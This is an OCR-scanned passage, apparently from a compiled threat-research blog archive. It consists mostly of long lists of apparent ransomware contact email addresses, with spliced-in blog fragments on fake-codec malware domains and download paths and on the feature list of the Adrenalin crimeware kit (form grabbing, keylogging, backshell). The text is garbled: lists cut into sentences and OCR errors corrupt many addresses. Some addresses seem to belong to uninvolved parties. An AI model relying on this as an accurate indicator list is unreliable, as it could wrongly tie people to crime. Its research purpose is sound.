_garryweber@protonmail.ch 
vitali2001by@yahoo.co.uk 
decrypt2017@india.com 
Daniel.Abram@india.com 
serverLO@mailfence.com 
Bitcash@india.com 
server6@mailfence.com 
Michel _Robinson@india.com 
odin odin@india.com 
jeepdayz@india.com 
server7@mailfence.com 
rafail@india.com 
WormkKiller@india.com 
pingy@india.com 
jeepdayz@aol.com 
badadmin@bigmir.net 
d7516@ya.ru 

denis help@inbox.ru 
serverfencel@mailfence.com 
lambdasquad.hI@yandex.com 
dompetpresiden@gmail.com 


dompetpresiden@gmail.com 


MattieSamanthaPutri@gmail.com 


nemesis-decryptor@india.com 


your last chance _help@protonmail.com 


yourlastchancehelp@cock.li 
wecanhelpyou@elude.in 
w3canh3lpyOu@cock.li 
wecanh3lpyou2@cock.li 
icanhelp@xmpp.jp 
jschweiz@protonmail.ch 
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admin@spora.bz 

spora.help@gmail.com 

arran.bishop89@aol.com 

jqueryxmpp@exploit.im 

tosomething ne@india.com 

someone _ne@india.com 

lacky@india.com 

trulolo@india.com 

bit-tray@tutanota.com 

zer90@tutanota.com 

res _sup@india.com 

res _sup@computer4u.com 

res _reserve@india.com 

cryptx.support@yandex.com 
BM-2cXfK4B5W9nvci7dYxUhuHYZSmJZ9zibwH@bitmessage.ch 
x2486@india.com 
BM-2cUGvXP5PUnnbTBwLfk5cTDYQL55PX4kakK@bitmessage.ch 
BM-2cWSYhFXhuHyLGLusdmnXP7TNpCW6KEu1z@bitmessage.ch 
BM-2cT72URgslAWGV6Wy6KBu2yuj3ychN5vxC@bitmessage.ch 
btcmoon@keemail.me 

helpfile@asia.com 

hrmsdecrypt@mail.com 

novusordoseclorum100@gmail.com 

unblockmeplease@cock.li 

olv100@mail.ru 

vegeta85@safe-mail.net 

lockyransomware666@sigaint.net 

rsapl@openmailbox.org 

estion@sigaint.org 

3nigma@0.pl 

3nigma@firemail.cc 

excon@cyberdrillexercise.com 

ghanihate@gmail.com 

ghani.hate@gmail.com 

DecryptFiles@tutanota.com 
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cyberking@indonesianbacktrack.or.id 
lastocra@gmail.com 
angledarknet@gmail.com 
yedekveri258@gmail.com 
yedeksecurty@gmail.com 
lineasupport@protonmail.com 
no.xm@protonmail.ch 
no.btc@protonmail.ch 
decrypts@protonmail.com 
decrypter@protonmail.ch 
sql772@aol.com 
decrypter@onyon.su 
tk.btcw@protonmail.ch 
avalona.toga@aol.com 
3bitcoins@protonmail.com 
westbleep@india.com 

ransom _ph@mail2noble.com 
hakermail@someting.com 
contact here _me@india.com 
flotera@2.pl 
flotera@protonmail.ch 
blackjockercrypter@gmail.com 
blackjocilcercrypter@gmail.com 
blackjockercrypter@gmai.com 
help50@yandex.ru 
Satana@mail.ru 
bitSatana@mail.ru 
blackmagic8@yandex.com 
kirk.help@scryptmail.com 
kirk.payments@scryptmail.com 
lock2017@unseen.is 
lock2017@protonmail.com 
lockerpay64@yandex.ru 
MacAndChessDecrypt@macr2.com 


meteoritan6570@yandex.ru 
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sook2serit@seznam.cz 
nporchi79@seznam.cz 
johnmorcbw@seznam.cz 
peyton7zdupont@seznam.cz 
project34@india.com 
revO0@india.com 
revenge00@writeme.com 
rev __reserv@india.com 
itprocessor@protonmail.com 
pcambulance1l@protonmail.com 
leablossom@yandex.com 
blossomlea@yandex.com 
leablossom@dr.com 
windat1@protonmail.com 
windat@dr.com 
windat@tuta.io 
windatl@yandex.com 
windat2@yandex.com 
biossyS@protonmail.com 
biossysx@protonmail.com 
biossys@dr.com 
biossys@tuta.io 
biossysx@tuta.io 
biossys@yandex.com 
biossysx@yandex.com 
aoneder@mail.ru 
lucifer.fool@yandex.com 
d3cryptOr@lelantos.org 
poiskiransom@airmail.cc 
Hc9@2.pl 

Hc9@goat.si 
ZinoCrypt@protonmail.com 
zooolo@darknet.nz 
aes-ni@scryptmail.com 
michell _nulled@protonmail.ch 
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atlashelp@protonmail.com 
atlasfix@protonmail.com 
atlasfix@dr.com 

babis@mfcr.cz 
black-rose@outlook.co.th 
cerberos-decrypter@lgmail.com 
cerberus-decrypter@lgmail.com 
leprogames777@gmail.com 
ransomwareinc@yopmail.com 
flatcher3@india.com 
jeeperscrypt@protonmail.com 
kampretos@protonmail.com 
Imaoxus@safe-mail.net 
steverusell@mail.com 
KyMERA-Gian@outlook.com 
one@proxy.tg 


donotreply@stmargaretsbrookfield.org.uk 


a.rashepkin@gmail.com 
lucaS12@mail.ru 
fromriga@yahoo.com 
darren.griffin@live.co.uk 
fascom04@mail.ru 
maslovagoluba65@gmail.com 
kaz3162@ya.ru 
romanko.a@gmail.com 
betmenbar@gmail.com 
akorulin@gmail.com 
jo-l@yandex.ru 
3270604@gmail.com 
stancellove@yandex.ru 
aesklim@gmail.com 
zapravkagomel@gmail.com 
k.oltynaeva@rambler.ru 
dk.sumy@gmail.com 


3axapka@gmail.com 


20947 


6761994@mail.ru 
pye944@gmail.com 

ui _aleksey@mail.ru 
jawaclub777@rambler.ru 
nikolasautumn@gmail.com 
Volosi87@gmail.com 
alfasoft@ex.ua 
yarkaya05@gmail.com 
kato50@mail.ru 
vOvanidze@mail.ru 
mrbin775@gmx.de 
mrbin775@protonmail.com 
897698@mail2tor.com 
Datares@india.com 
bitkangoroo@mailinator.com 
itankanl2@gmail.com 
yotabyte@protonmail.com 
liukang@mortalkombat.su 
don-corleone@mortalkombat.su 
d.fedor2@aol.com 

mk _rain@aol.com 
mk.kunglao@aol.com 
pay@cyberdude.com 
karnel.fikol@aol.com 
partner.support@kaspersky.com 
cryptoviki@gmail.com 
ransomed@india.com 
donationl1@protonmail.ch 
data0001@tuta.io 
REDxVENOM@protonmail.ch 
heyklog@protonmail.com 
newcrann@qq.com 
mk.priapos@bigmir.net 
putraid1900@gmail.com 
oxo.foxo@yandex.com 
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sinpayy@yandex.com 

bObrik@i.ua 

fns-service@pochta.com 
zakarai0611420990@gmail.com 
VisionDep@sigaint.org 
helppppppp@meta.ua 
beqins@colocasia.org 
bilbo@colocasia.org 
frodo@colocasia.org 
trevor@thwonderfulday.com 
bob@thwonderfulday.com 
bil@thwonderfulday.com 
xncrypt@protonmail.com 
cutterswish@torbox3uiot6wchz.onion 
isabell@torbox3uiot6wchz.onion 
gilbertharmony687y@gmail.com 
gilbertpra@torbox3uiot6wchz.onion 
colecyrus@torbox3uiot6wchz.onion 
libbywovas@dr.com 
libbywovas@torbox3uiot6wchz.onion 
martinabrmqo@usa.com 
martinabrmqo@torbox3uiot6wchz.onion 
teduggreene@adexec.com 
leenapidx@snakebite.com 
rikkibarker@torbox3uiot6wchz.onion 
armoon2g8i@chef.net 
armoon2g8i@torbox3uiot6wchz.onion 
codyprince92@mail.com 
codyprince@torbox3uiot6wchz.onion 
adapaterson@mail.com 
davilarita@mail.com 
davilarita@torbox3uiot6wchz.onion 
jilyjily@torbox3uiot6wchz.onion 
gangua@torbox3ui0t6wchz.onion 


kaufman@torbox3uiot6wchz.onion 
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HiddenMan0135@protonmail.com 
azazel-bot@india.com 
SK1CU3SE3FI7L@yandex.ru 
bok@jabb.im 

cryptogod@airmail.cc 
executioner.ransom@protonmail.com 
executioner.ransom@bk.ru 
executioner.update@protonmail.com 
scl9ZLFCEpxdskvWGLLhNUnM6dUG7yikhz2W@outlook.com 
teroda@bigmir.net 
BM-2cWscKHR4SVHDYp4FqVHC5D5f] FNAWNwcc@bitmessage.ch 
systems64x@tutanota.com 
jafarzo@yandex.ru 
flexyhome@gmail.com 
quakeway@mail.ru 
1Iscf2q9c55lan4gpw@guerrillamail.com 
athe.vdb@mail.com 

qa458@yandex.ru 

help-mails@ya.ru 

alexous@bk.ru 

michael78@india.com 
BM-2cu7jispwyc8ttpjfw26clfk3v3mrvsbj7@bitmessage.ch 
suupport@protonmail.com 
copier@victimsdomain.com 

mack _traher@india.com 
bkmf@gmx.com 

contatoaac@vpn.tg 
darkpart@tutanota.com 
darkware@tutanota.com 
ACCUDATA1@tutanota.com 
donald@trampo.info 
15010050@tutamail.com 
17042102@tutamail.com 
43rgwe723E94@tutanota.com 
1173022@protonmail.com 

20950 


PetcherMcneill@protonmail.com 
PeterMcneill@tutanota.com 
LoryEstside@protonmail.com 
blackzd@derpymail.org 
blackzd@xmail.net 
blackoutsupport@mail2tor.com 
blackzd@safe-mail.net 
decrypted8@bigmir.net 
tyspalento@bigmir.net 
mitoplent@safe-mail.net 
bbqb@protonmail.com 
qwqd@protonmail.com 
Inq@protonmail.com 
decrypter.files@mail.ru 
extel@msgden.net 
exte2@protonmail.com 
exte3@reddithub.com 
whiterabbit01@mailinator.com 
luisa91@you-spam.com 
michonne.027@fake-box.com 
hustonwehaveaproblem@keemail.me 
Payfordecrypt@protonmail.com 
paymifordecrypt@protonmail.ch 
happyness@keemail.me 
nefartanulo@protonmail.com 
siliconegun@tutanota.com 
forbiddenmr403@gmail.com 
mr403forbidden@hotmail.com 
admin@zayka.pro 
sporter4499@protonmail.com 
only4you@protonmail.com 
oxar.ransomware666@protonmail.com 
maitregauillaume@protonmail.com 
msdecry@aol.com 
scorpionlocker@gmail.com 
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m.pirat@aol.com 

anubi@cock.li 
hello@boomfile.ru 
hernansec@protonmail.ch 
ProjectCyRoN@candymail.de 
ProjectCyRoN@candymail.com 
glushkov@protonmail.ch 
igor.glushkov.83@mail.ru 
empty01@techmail.info 
empty02@yahooweb.co 
empty003@protonmail.com 
errorOl@msgden.com 
errorO2@webmeetme.com 
errorO3@protonmail.com 
unransom@mail.com 
gaetano.olsen@protonmail.com 
gaetano.olsen@inbox.|v 
gaetano.olsen@india.com 
gaetano.olsen@pobox.sk 
greenvirus707@gmail.com 
getmyfiles@keemail.me 
getmyfiles@scryptmail.com 
getmyfiles@mail2tor.com 
tbhranso@protonmail.com 
InfinityShadow@Protonmail.com 
InfiniteDecryptor@Protonmail.com 
cho.danibler@yandex.com 
Emalcho.dambler@yandex.com 
blackhatdarkmatrix@gmail.com 
blind@cock.li 
supp01@airmail.cc 
supportdecrypt2@cock.|i 
atilla666@tutanota.com 
dilmaonion@keemail.me 
payment.hkdecrypt@mail.ru 
20952 


Interestingly, within the mirrored copy now tweaked and distributed for free using free image 
hosting services as infrastructure provider for the layout, there are also leftovers from the 
original campaign template that they mirrored - which ultimately leads us to [2]DATORU 
EXPRESS SERVISS Ltd (AS12553 PCEXPRESS-AS) or zlkon.lv [3]In the wake of [4]UkrTeleGroup 
Ltd’s [5]demise - don’t pop the corks just yet since the revenues they’ve been generating for 
the past several years will make it much less painful - a significant number of UkrTeleGroup 
customer, of course under domains, have been generating quite some malicious activity at 
zikon.lv for a while. 


Portfolio of fake codecs serving domains parked at the original mirrored domain’s IP : 
xxxporn-tube .com (93.190.140.56) 

uporntube-07 .com 

tubeporn08 .com 

porn-tube09 .com 


2098 


incantofiles@bitmessage.ch 
incantofiles@india.com 
restoreassistant2@tutanota.com 
info@decrypt.ws 

edinstveniy decoder@aol.com 
paradise@all-ransomware. info 
uqmv@protonmail.com 
support@all-ransomware.info 
file@p-security.|i 
fileparadise@cock.li 
immortalsupport@cock.li 
opensafezona@cock.li 
decodor@airmail.cc 
2k19sys@p-security. li 
blackblackra@tuta.io 
fiasco911@tutamail.com 
agreemaster@tutanota.com 
agreemaster@protonmail.com 
pendor@tuta.io 

pendor 1@tutanota.com 
pendor111@tutanota.com 
getyourfilles@bigmir.net 
getyourfilles@india.com 
sofucked@freespeechmail.org 
_1559@yourmail.com 
allcrys@naij.com 
anoncrack@protonmail.com 
ms.decry@aol.com 
cybervigilante4453@protonmail.com 
x1881@tuta.io 
x1883@yandex.com 
x1881@protonmail.com 
x1884@yandex.com 
lordashadow@gmail.com 


TEST@protonmail.com 
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bad boy700@aol.com 
paper planel@aol.com 
barcelona _100@aol.com 
elizabethz7culjones@aol.com 
gomer _simpson2@aol.com 
phobos _helper@xmpp.jp 
phobos _helper@exploit.im 
phobos.encrypt@qq.com 
pixell@tutanota.com 
pixell@cock.li 
tlalipidas1978@aol.com 
cercisoril979@aol.com 
posiccimen1982@aol.com 
prejimzalma1972@aol.com 
taverptintral985@aol.com 
withdirimugh1982@aol.com 
hidebak@protonmail.com 
stanodexnel1982@aol.com 
waitheisenberg@xmpp.jp 
tedmundboardus@aol.com 
tylecotebenji@aol.com 
phobos helpper@xmpp.jp 
decryptfiles@420blaze.it 
decryptfiles@cock.lu 
absonkaine@aol.com 
klemens.stobe@aol.com 
autrey.b@aol.com 
alphonsepercy@aol.com 
park.jehu@aol.com 
kylenoble726@aol.com 
phobosrecovery@cock.|i 
phobosrecovery@tutanota.com 
darillkay@aol.com 

abbott wearing@aol.com 
thorpe.grand@aol.com 
20954 


luciolussenhoff@aol.com 
grattan.|@aol.com 
costellon@aol.com 
carmichael.lion@aol.com 
night _illusion@aol.com 
cello _dodds@aol.com 
hickeyblair@aol.com 
com-gloria@tutanota.com 
com-gloria@protonmail.com 
nichols I@aol.com 
fileob@protonmail.com 
back7@protonmail.ch 
keyO7@qq.com 
kew07@qq.com 
helpyourdata@qq.com 
ramsey _frederick@aol.com 
lofutesdogg1983@aol.com 
gabbiemciveen@aol.com 
christosblee@aol.com 
randal _inman@aol.com 
gherardobaxter@aol.com 
upfileme@protonmail.com 
simonsbarth@aol.com 
thedecrypt111@qq.com 
walletwix@aol.com 
datadecryption@countermail.com 
leeming.derick@aol.com 
helpteam38@protonmail.com 
danger@countermail.com 
wewillhelpyou@qq.com 
walletdata@hotmail.com 
hartpole.danie@aol.com 
lockhelp@xmpp.jp 
batecaddric@aol.com 


burnofin@hotmail.com 


20955 


cleverhorse@protonmail.com 
greg.philipson@aol.com 
hadleeshelton@aol.com 
fileisafe@tuta.io 
Keta990@protonmail.com 
supportcrypt2019@protonmail.com 
zoye596@protonmail.com 
b.morningtonjones@aol.com 
dennet.smellie@aol.com 
Quantroei@protonmail.com 
sailormorgan@protonmail.com 
irvinclarke@aol.com 
crysall.g@aol.com 
2172998725@qq.com 
friends2019@protonmail.com 
lachneyorlachb@aol.com 
worldofdonkeys@protonmail.com 
worldofdonkeys@xmpp.jp 
beautydonkey@xmpp.jp 
larabita@cock.|i 

member987 @tutanota.com 
member987 @cock.|i 
tirrelllipps@aol.com 

back _ins@protonmail.ch 
plombiren@qq.com 
bbbitcrypt@tutanota.com 
bbitcrypt@protonmail.com 
limboshuran@cock.li 
repairfiles@foxmail.com 
files2@protonmail.com 
zax444@qq.com 
zax4444@qq.com 
recovermyfiles2019@thesecure.biz 
horsesecret@xmpp.jp 
kalle.tomlin@aol.com 

20956 


tirrellipps@aol.com 
captainpilot@cock.li 
onlyfiles@aol.com 
britt.looper@aol.com 
stuart.wittie@aol.com 
decriptionsupport911@airmail.cc 
washapen@cock.|i 
restorebackup@qq.com 
viadolorosa@tuta.io 
funnyredfox@aol.com 
lewisswaffield.a@aol.com 
XXXNXXxX@cock.|i 
hanesworth.fabian@aol.com 
ciaprepoulep1977@aol.com 
bowen.bord@aol.com 
recoveryfast@airmail.cc 
patern32@protonmail.com 
Unlockfiles@qq.com 
kickclakus@protonmail.com 
kickclak@cock.li 
relvirosal981@aol.com 
cleverhorse@ctemplar.com 
cleverhorse@xmpp.jp 
debourbonvincenz@aol.com 
cosmecollings@aol.com 
phobos healper@xmpp.jp 
stocklock@airmail.cc 
restoringbackup@airmail.cc 
berne.fiddell@aol.com 
gruzudo@cock.|i 

harlin marten@aol.com 
octopusdoc@mail.ee 
octopusdoc@airmail.cc 
agent5305@firemail.cc 


kenny.sarginson@aol.com 
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francispilmoor@aol.com 
keysfordecryption@airmail.cc 
keysfordecryption@jabb3r.org 
maitlandtiffaney@aol.com 
topot@cock.|i 
decryptfiles@qq.com 
decryptfiles@hot-chilli.eu 
lucky _top@protonmail.com 
saveyourfiles@qq.com 
paybtc@sj.ms 
jabberpaybtc@sj.ms 
ofizducwe111988@aol.com 
kabennalzly@aol.com 
flexney.pail@aol.com 
anamciveen@aol.com 
dominga.k@aol.com 
chagenak@airmail.cc 
kokux@tutanota.com 
decrypt here@xmpp.jp 
mr.helper@jabb3r.de 

decrypt here@xrnpp.jp 
online24decrypt@airmail.cc 
youcanwrite24h@airmail.cc 
patiscaje@airmail.cc 
recoverhelp2020@thesecure.biz 
sverdlink@aol.com 

dessert guimauve@aol.com 
2183313275@qq.com 
werichbin@cock.|i 

wang team777@aol.com 
wang team999@aol.com 
leonardo@cock.lu 
backup.iso@aol.com 
deltatech@tuta.io 
mccreight.ellery@tutanota.com 
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2020x0@protonmail.com 
2020x@cock.|lu 
veriousl@cock.li 
filesreturn@cock.|i 
decphob@protonmail.com 
mecybaki@firemail.cc 
naqohiky@firemail.cc 
ezequielanthon@aol.com 
robinhood@countermail.com 
eccentric _inventor@aol.com 
noyes.brice@aol.com 
sookie.stackhouse@gmx.com 
SimpleSup@cock.li 
DavidsHelper@protonmail.com 
SimpleSup@tutanota.com 
subikO99@tutanota.com 
Helpforfiles@xmpp.es 
spacexhuman@tutanota.com 
spacexhuman@protonmail.com 
spacexhuman@jabb.im 
bernard.bunyan@aol.com 
saveisos@aol.com 
devos@countermail.com 
kxxe@airmail.cc 
guxehys@mailfence.com 
sparem@kolabnow.com 
save2020@qq.com 
xizers@airmail.cc 
JackKarter@gmx.com 
JackKarter@cock.|i 
recoverycode@protonmail.com 
pyyring23@protonmail.com 
fastway@tuta.io 
miadowson@tuta.io 


unlocker@criptext.com 


20959 


virtualhorse1@protonmail.com 

serhio.vale@tutanota.com 

useHHard@cock.li 

victorlustig@gmx.com 

elfoash@protonmil.com 

helpyoubus11@tutanota.com 
helpyourdesk11@protonmail.com 

xgen@tuta.io 

zgen@tuta.io 

deparisko@secmail.pro 

deparisko@dnmx.org 

gener888@tutanota.com 

sacural716@cock.li 

xdone@tutamail.com 

starcomp@jabb.im 

bambam988@tutanota.com 

jiminok31@cock.li 

eddyayman@gmail.com 

asdqzx51@gmail.com 
BM-2cUunjtSxYEd6Ase6hbhVyvMBVzXPUVdvu@bitmessage.ch 
BM-2cVCMjYXg5ZwLi2t6mETUeQYHMNDmbfFA2@bitmessage.ch 
BM-2cSs3qfF5wolx6EQbsX]X3nwkzJwYx9R98@bitmessage.ch 
BM-2cXpE68uaYtydjuGBRqMUF2DVazFJj4Xvz@bitmessage.ch 
BM-2cWrd12TUEZGmMnPMHBMwmB32w45fZ5rZS3@bitmessage.ch 
rastakhiz@protonmail.com 

yOO00@tuta.io 

yOO000z@yandex.com 

yOO00s@yandex.com 

yO000@protonmail.com 

jhash.bancaenlinea@zoho.com 

bitchasshole@protonmail.com 

getkeys@tutanota.com 

weknownit@mail2tor.com 

bomboms123@mail.ru 

yourfood20@mail.ru 
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aus 8@xmpp.jp 

fraktal@xmpp.jp 
hiddentear@protonmail.com 
v.henschel@t-online.de 
OrdinalScale@protonmail.com 
OrdinalScale@protonmoil.com 
decrypt sad@protonmail.com 
novicehax890@gmail.com 
wannasmile@tuta.io 

xzzx@tuta.io 
XZZX1@protonmail.com 
XzZzZx10@yandex.com 
XZZx101@yandex.com 
blind@airmail.cc 
TerraBytefiles@scryptmail.com 
Cerber RansomWare@qq.com 
kaya.kyasor99@yandex.com 
office@adriadoo.com 
file-spider@protonmail.ch 
godra@protonmail.ch 
resolutionransomware@protonmail.com 
masteroracle4life@protonmail.com 
0x720x730x610x30@tutanota.com 
0x720x730x610x31@tutanota.com 
SantaEncryptOr 3.0@protonmail.ch 
CR7213uDS32s@protonmail.com 
ngocquy.096613@gmail.com 
styxsupport@mail2tor.com 
worknow@keemail.me 
worknow@protonmail.com 
worknow8@yandex.com 
worknow9@yandex.com 
worknow@techie.com 
cocbkup@gmail.com 


tornado _777@aol.com 
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BM-2cXXgKAo8HzZUmijt8KMywZYHm8xDHhxwZg@bitmessage.ch 
BM-2cXXgKo8HzZUmijt8KMywZYHm8xDHhwwgg@bitmessage.ch 
ruamylove.28@gmail.ru 
Heropointyt@gmail.com 
wfmmp8@sigaint.org 
serverup@keemail.me 
serverup@protonmail.com 
serverupl1@yandex.com 
serverup3@yandex.com 
ann.c@iname.com 
systempcl@keemail.me 
systempc18x@protonmail.com 
hashby@yandex.com 
ashbyh@yandex.com 
helen.a@iname.com 
systemwall@keemail.me 
systemwall@protonmail.com 
systemwall@yandex.com 
systemwalll@yandex.com 
XXXX.X@dr.com 
krom.mork@openmail.cc 
TheBlackRuby@Protonmail.com 
blackruby@tutanota.com 
TheBlackRuby@torbox3uiot6wchz.onion 
masterdecrypt@openmailbox.org 
kinaman@protonmail.com 
dekode@qq.com 
supdecrypt@foxmail.com 
supportdecryption@cock.li 

Billy will help you@protonmail.com 
cryptonationusa@protonmail.com 
servicemanager@yahooweb.co 
servicemanager2020@protonmail.com 
servicemanager@jabb.im 


emte@adc-soft.com 
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tubeporn09 .com 
xxxporn-tube .com 
allsoft-free .com 
all-softfree .com 
lsoftfree .com 
porntubenew .com 


Download locations : 
brakeextra .com/download/FlashPlayer.v..exe (94.247.2.183) 
brakeextra .com/download/TestCodec.v.3.127.exe 


Entire portfolio of domains parked at (94.247.2.183) : 
brakeextra .com 
thebestporndump2 .com 
fire-extra .com 

xp-extra .com 

delfiextra .com 

qazextra .com 

track-end .com 
fire-movie .com 
extrabrake .com 
crack-serial-keygen-online .com 
extra-turbo .com 
extra-nitro .com 
apple-player .com 
meggauploads .com 
soft-free-updates .com 
quicktimesoft .com 
cleanmovie .net 
nitromovie .net 
trackgame .net 

quotre .net 

rexato .net 

spacekeys .net 


Dots, dots dots, trackgame .net is once again proving the multitasking mentality of cy- 
bercriminals these days - it’s one of the download locations participating in the recent 
[6]Google Video search queries poisoning attacks. 


. http://ddanchev. blogspot .com/2008/07/template-ization-of-malware-serving.htm 
. http://pandalabs.pandasecurity.com/archive/New-Rogue_3A00_-Total-Defender. aspx 


ttp://voices.washingtonpost.com/securityfix/2009/01/troubled_ukrainian_host_sideli.htm 


. http://ddanchev. blogspot . com/2008/02/geolocating-malicious-isps.htm 
. http: //ddanchev.blogspot .com/2008/07/lazy-summer-days-at-ukrtelegroup-1tds.htm 


ttp://ddanchev.blogspot.com/2009/01/poisoned-search- queries-at-google-video. htm 
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5.2.2 Copycat Web Malware Exploitation Kits Are Still Faddish (2009-02-02 16:21) 


The oversupply of web malware exploitation kits is in fact 
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5.2.3 Crimeware in the Middle - Adrenalin (2009-02-03 14:42) 


What is Adrenalin? Adrenalin is an alternative to [1]the Zeus crimeware kit that never actually 
managed to scale the way Zeus did. Following recently leaked copies of what is originally 
costing a hefty $3000, crimeware kit Adrenalin, it’s time to profile the kit, discuss its key 
differentiation factors from Zeus, and emphasize on why despite the fact that it leaked, the 
kit is not going to take any of Zeus-es market share. At least not in its current form. 


In the spirit of the emerging copycat web malware exploitation kits, Adrenalin too, isn’t 
coded from scratch, but appears that - at least according to cybercriminals questioning its 
authenticity on their way to secure a bargain deal when purchasing it - Adrenalin is using 
portions of Corpse’s original A-311 release. 


Adrenalin’s description and features : 

"Injections system - inserting html /javascript code in the page / files / javascript or substitution 
of one code by another injection occurs in the stream mode, ie the modified page is loaded at 
once! 

(not as in the other BHO based trojans with insertions only after the full load the page (causing 
javascript problems) or limiting the impact (if for instance the user is on a mobile device 
connection). In our implementation, all works quickly and efficiently! 


- The collection of pieces of text from the html pages, as one of the modes of operation 
injector (balance, etc ..) 


- Ftp grabbing - sniffer handles traffic and rip out from access to FTP. All of this is going 
in an easy to read and process the form 


- Collector of certificates. Pulling out of all installed certificates including attempts to 
commit, and certificates that are marked as uncrackable. Certificates neatly stored for each 
individual bot. 


- Page redirector. allows you to replace a page or separate framing in the network. ev- 
erything is done completely unnoticed. substitution of the content occurs in the interior 
windsurfing, and even then the browser and any special lotion can be confident that is what 
you want. 
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helper2@aveuva.com 
helper2@biehes.com 
ithelpconcilium@tutanota.com 
nicolasmarvinlor@outlook.com 
alanson _street8@protonmail.com 
lambchristoffer@protonmail.com 
aireyeric@protonmail.com 
ellershaw.kiley@protonmail.com 
raingemaximo@protonmail.com 
gareth.mckie31@protonmail.com 
crypt@ctemplar.com 
testing@example.com 
antefrigus@cock.li 
marseldeneud@yandex.com 
cyborgyarraq@protonmail.ch 
lazareus234@protonmail.com 
aksdkjaOsdp@ctemplar.com 
nyton@cock.li 
cr1-silvergold1@protonmail.com 
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Phabos@cock.|i 
u.contact@aol.com 
ret3pwn@gmail.com 


cheotOs de@protonmail.com 


puljaipopre1981@protonmail.com 
viomukinam1978@protonmail.com 
onlinebigbrotheriswatchingyou@protonmail.com 


onlinebigbrotheriswatchingyou@tutanota.com 


msupport2019@protonmail.com 
msupport@elude.in 
sambrero@tfwno.gf 
dupsano@cock.lu 
MattCohn@tutanota.com 
BruceCohn88@protonmail.com 
unlocking2020@protonmail.ch 
burlocker2020@tuta.io 
runlocker@protonmail.com 
ranlock@keemail.me 

cluff sarah@aol.com 
restmefast@tutanota.com 
helpservise@mail2tor.com 
helpservise@ctemplar.com 
recovery2020@cock.li 
yesbay@protonmail.com 
uspexl@cock.li 
uspex2@cock.li 
regina4hgoregler@gmx.com 
pansymarquis@yahoo.com 
filescros@protonmail.ch 
filescrp@42O0blaze.it 
filescro@yandex.ru 
helpservisee@ctemplar.com 
helpservisee@cock.li 
helpoperator2@protonmail.com 


helpoperator@firemail.cc 
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helpoperator@thesecure. biz 
payfast290@mail2tor.com 
payransom500@mail2tor.com 
GoodDay@privatemail.com 
filelocker@protonmail.ch 
SupportClown@elude.in 
Heeeh98@tutanota.com 
becareful98@aol.com 
xredline2@gmail.com 
xredline3@gmail.com 
xredlinel@gmail.com 
ancrypted@protonmail.com 
ancrypted@keemail.me 
sclown@elude.in 
connectme@elude.in 
supportme@elude.in 
decodeguide@keepmail.me 
supclown@protonmail.ch 
backfile99@protonmail.com 
recoryfile@tutanota.com 
decrypt353@aol.com 
adminenc919@cock.li 
sirencmoj@cock.|i 

ultrasert7 7@gmail.com 
securityteamex@yandex.com 
rimon.argan@gmail.com 
poeasws@protonmail.com 
help.decryption@gmail.com 
yardimaill@aol.com 
yardimail2@aol.com 
paymentbtc@yahoo.com 
support@anonymous-service.cc 
crptcloud@protonmail.ch 
afroditateam@tutanota.com 


afroditasupport@mail2tor.com 
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- Domain redirector. forwards all requests from the original site on the fake. address 
bar, and all references point to the original course can also be used to block access to certain 
sites 


- Universal form grabbing puller forms, can strip the data from the virtual keyboard these 
forms can rip off, even with not fully loaded pages. As distinguished from the other crimeware 
kits working through the tracking of users clicking buttons / links it intercepts the data has 
already been formed, which can be seen in the log. Data can be collected all the running, and 
keyword (filter) 

to delete the logs; noise over debris to chat and not necessary for the work sites. 


All data are transmitted in encrypted form, which is important to bypass the protection, 
like for instance ZoneAlarm’s ID Lock. Undoubted advantage is also that the logs are sent 
instantly - in parallel with the data sent to the original site. No need to worry that the victim 
will go into an offline and accumulated locally log form grabbing are not able to send. 


- Screenshots at the address 

- TAN grabbing. The technology allows to effectively collect workers TANs 

- Periodic cleaning of cookies/flashcookie. 

- Grabbing around-the-forms words (without adjustment - Adrenalin defines its own algorithm 
that it must be collected. algorithm Improved!) 

- The collection of passwords, for instance Protected Storage (IE auto complete, protected 
sites, outlook) 

- Classic keylogger 

- Cleaning system from BHO trojans, advertising panels and other debris. As is well known - 
are less vulnerable machines, and want to put on something more. Cleaning system greatly 
increases the chances of survival 

- Anti-Anti Rootkit mechanisms 

- Work on the system without the EXE file 

- User-friendly format logs! Forget the piles of files stupid! 

- Socks4 /5 + http (s) proxy server enabled on the infected host 

- Shell + Backshell enabled on the infected host 

- Socks admin 

- Management of each bot individually, or simultaneously (Downloading files, updating settings, 
etc.) 

- Requires PHP on the web based command and contro! host 

- Ability to output commands (including downloads), taking into account the country’s bot 
(function as a resident loader statistically for programs) - and other small pleasures" 
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afroditateam@firemail.cc 
helpbitpy@cock.li 
pay4netwww@protonmail.com 
checkmail7@protonmail.com 
bapcocrypt@ctemplar.com 
magician@ctemplar.com 
758681729565-rc7fgq0 7icj8c9dm2gi34a4cckv235v1@developer.gserviceaccount.com 
asgardmaster5@protonmail.com 
ragnarOk@ctemplar.com 
j.jasonm@yandex.com 

ragnarok _master@protonmail.com 
yawkyawkyawk@cock.li 
ragnarOk@tutanote.com 
christianl1986@tutanota.com 
EMAIL-MREncptor@protonmail.com 
EMAIL-MOrphine@cock.li 
MOrphine@cock.|i 

svmst@cock.li 
arnoldmichel2@tutanota.com 
kemalllare@gmail.com 
entercritical@prolonmail.com 
AllZData@cock.li 
jakejake1234@cock.li 
Datauser17234@protonmail.ch 
craftech@protonmail.ch 
jiesuofuwu@gmail.com 
dvpnxyz@gmail.com 
DamianOlsonsnowdrop@cock.li 
gibberishEdmundBass@protonmail.com 
anenerbex@protonmail.com 
anenerbex@cock.|i 
lanthanumRosakKiddgentile@cock.li 
affrontuUmerSummers@tutanota.com 
TentwenUpper1l@protonmail.com 
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fevrbdy@airmail.cc 
fevrbdy@protonmail.com 
sodinsupport@cock.li 
ReftuOne@protonmail.com 
costestu@cock.|i 
setestco@protonmail.com 
zetterlow@tutanota.com 
crossroads2371@protonmail.ch 
infectionplex@cock.li 
uzuvnkyh@protonmail.com 
nomikonfirst@tuta.io 
nomikonsecond@tuta.io 
pianist6@protonmail.com 
polleryoul@ctemplar.com 
decrypter0203@gmail.com 
salbom.smtp@gmail.com 
gtimph@protonmail.com 
cupermate@protonmail.com 
cupermate@elude.in 
vinilblind@protonmail.com 
blefbeef@elude.in 
imperial755@protonmail.com 
imperial@mailfence.com 
greemsy.jj@protonmail.ch 
jj.greemsy@mailfence.com 
johny2recoveryusa@protonmail.com 
johny3@mailfence.com 
jorge.smith@mailfence.com 
finbdodscokpd@privatemail.com 
mallyrecovery@protonmail.ch 
mally@mailfence.com 
ssdfsdfsdf@mailinfence.com 
ssdfsdfsdf@protonmail.com 
rickowens@onionmail.org 
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john.blues3i7456@protonmail.com 
